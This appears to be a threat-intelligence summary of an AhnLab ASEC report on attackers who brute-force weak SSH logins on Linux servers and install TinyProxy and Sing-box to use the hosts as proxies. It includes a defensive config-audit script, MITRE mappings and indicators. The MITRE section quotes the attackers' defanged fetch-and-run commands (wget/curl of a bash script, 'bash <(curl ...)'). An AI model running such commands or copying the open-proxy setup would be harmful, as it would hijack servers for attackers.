Analysis of Attacks Targeting Linux SSH Servers for Proxy Installation

Attackers are compromising poorly managed Linux servers by brute-forcing SSH logins that use weak credentials and then installing the proxy tools TinyProxy and Sing-box. These proxies let the attackers use the infected systems as proxy nodes, either to conceal other malicious activity or to generate profit. #TinyProxy #SingBox #LinuxServerAttacks

Key points

  • Linux servers with weak SSH credentials are targeted for brute-force login to install proxy services.
  • Attackers deploy TinyProxy by downloading and executing a Bash script that installs and configures it for unrestricted external access.
  • The TinyProxy configuration is altered to allow connections from any IP, exposing port 8888 for proxy exploitation.
  • Sing-box, an open-source multiprotocol proxy tool, is installed through a series of commands fetched from GitHub repositories.
  • Sing-box supports multiple bypass protocols such as vmess-argo and vless-reality, enabling circumvention of service blocks.
  • Attackers use legitimate tools instead of traditional proxy malware to covertly leverage compromised systems as proxy nodes.
  • System administrators are advised to use strong passwords, apply updates, deploy firewalls, and maintain up-to-date security software to prevent such intrusions.
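The configuration tampering described above (access control rules removed, "Allow 0.0.0.0/0" added, port 8888 exposed) as an added, defender-side check; this is not code from the ASEC report or from the attacker's script. It is a small parser for tinyproxy.conf that flags any allow-all rule and also the absence of any Allow line, which TinyProxy itself treats as allow-all. Both sample configs are constructed for illustration.

```python
from ipaddress import ip_network

# Constructed sample configs (not taken from the report). The first mimics the
# tampering described above: Allow rules stripped, "Allow 0.0.0.0/0" added, so the
# proxy on port 8888 answers to the whole Internet. The second is a sane baseline.
TAMPERED_CONF = """\
Port 8888
Listen 0.0.0.0
Allow 0.0.0.0/0
"""

HARDENED_CONF = """\
Port 8888
Listen 127.0.0.1
Allow 127.0.0.1
Allow 10.0.0.0/8   # internal clients only
"""

def parse_tinyproxy_conf(text):
    """Return (port, listen, allow_rules) from a tinyproxy.conf body.
    '#' comments and blank lines are ignored; directive names are case-insensitive."""
    port, listen, allows = None, None, []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "port":
            port = int(value)
        elif key == "listen":
            listen = value
        elif key == "allow":
            allows.append(value)
    return port, listen, allows

def audit_tinyproxy_conf(text):
    """Return a list of findings that make this an open proxy; empty means clean."""
    port, listen, allows = parse_tinyproxy_conf(text)
    findings = []
    if not allows:  # TinyProxy with no Allow/Deny lines accepts every client
        findings.append("no Allow rule: TinyProxy defaults to accepting every client")
    for rule in allows:
        try:
            if ip_network(rule, strict=False).prefixlen == 0:  # 0.0.0.0/0 or ::/0
                findings.append(f"Allow {rule} permits any source address")
        except ValueError:
            findings.append(f"Allow {rule} is not a valid address or network")
    if findings and listen not in ("127.0.0.1", "::1"):
        findings.append(f"listens on {listen or 'all interfaces'} port {port}: reachable externally")
    return findings
```

Run `audit_tinyproxy_conf()` over `/etc/tinyproxy/tinyproxy.conf` on hosts you manage; a non-empty result on a server that was never meant to be a public proxy is the kind of change this campaign leaves behind.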

MITRE Techniques

  • [T1110] Brute Force – Attackers targeted weak SSH credentials for unauthorized login to Linux servers. (‘Attackers are targeting SSH service that uses weak credentials’)
  • [T1105] Ingress Tool Transfer – Download and execution of a malicious Bash script using wget or curl to install TinyProxy. (‘wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh’)
  • [T1543] Create or Modify System Process – Modifying the TinyProxy configuration to enable external access and maintain persistence. (‘delete the access control rules… and add "Allow 0.0.0.0/0"’)
  • [T1059] Command and Scripting Interpreter – Use of bash scripts fetched from GitHub for installing Sing-box proxy tool. (‘bash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)’)

Indicators of Compromise

  • [File Hash] Malicious Bash script hashes associated with TinyProxy installation – 16d1dfa35d64046128290393512171ce, 35d79027834a3b6270455f59b54f2e19
  • [URL] Download locations for malicious scripts – hxxps://0x0[.]st/8VDs.sh, hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh

Read more: https://asec.ahnlab.com/en/88749/